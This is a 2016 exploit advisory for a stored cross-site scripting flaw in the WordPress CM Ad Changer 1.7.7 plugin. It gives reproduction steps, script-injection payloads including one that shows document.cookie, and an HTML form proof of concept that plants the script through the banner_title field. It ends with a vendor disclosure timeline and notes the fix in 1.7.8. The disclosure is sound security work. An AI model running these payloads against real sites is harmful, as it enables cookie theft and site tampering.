Home / os / winmobile

WordPress CM Ad Changer 1.7.7 Cross Site Scripting

Posted on 13 June 2016

#Exploit Title: CM Ad Changer Plugin XSS #Date: 9/6/2016 #Exploit Author: Aaditya Purani #Author Homepage: https://aadityapurani.com #Vendor Homepage: https://ad-changer.cminds.com #Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip (Updated) #Version: 1.7.7 #Tested on: Wordpress 4.5.2 #Category: Web applications Description: An Stored Cross Site Scripting was reported by me to CM Ad Plugins under which an Unprivileged user can Trigger a Stored XSS to perform malicious action or any attacker could send a Crafted link which can trigger Stored XSS Steps to Produce: 1) Go to CM Ad changers -> Campaigns 2) Create a Campaign. Enter whatever you want in Campaign settings, in the next tab "Campaign Banners", select an Image in Campaign images and in Banner Title enter this payload </script><script>confirm(/aaditya/)</script> </script><script>confirm(document.cookie)</script> 3) Enter Save & Payload triggers everytime you Return. Attacker Can Make a Payload File containing the following: <html> <body> <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1> <form action=" http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST"> <input type="hidden" name="campaign_id" value="1" /> <input type="hidden" name="title" value="Hacked by Aaditya" /> <input type="hidden" name="comment" value="" /> <input type="hidden" name="link" value="" /> <input type="hidden" name="status" value="on" /> <input type="hidden" name="banner_display_method" value="selected" /> <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" /> <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" /> <input type="hidden" name="banner_title_tag[]" value="" /> <input type="hidden" name="banner_tag[]" value="" /> <input type="hidden" name="banner_link[]" value="" /> <input type="hidden" name="banner_weight[]" value="0" /> <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" /> <input type="hidden" name="submit" value="Save" /> <input type="submit" value="Submit request" /> </form> </body> </html> This will Trigger Stored XSS at banner_title Parameter. It has been fixed and Version 1.7.8 Released on 9th June Visit Here: https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes ---------Timeline---------- 1st June : Reported to Vendor Creative Minds 3rd June: Additional Information provided 6th June: Team will able to reproduce 7th June: Fix and confirmed by me 9th June: Publically Fix released & Changelog updated 1.7.8 Regards, Aaditya Purani

 

TOP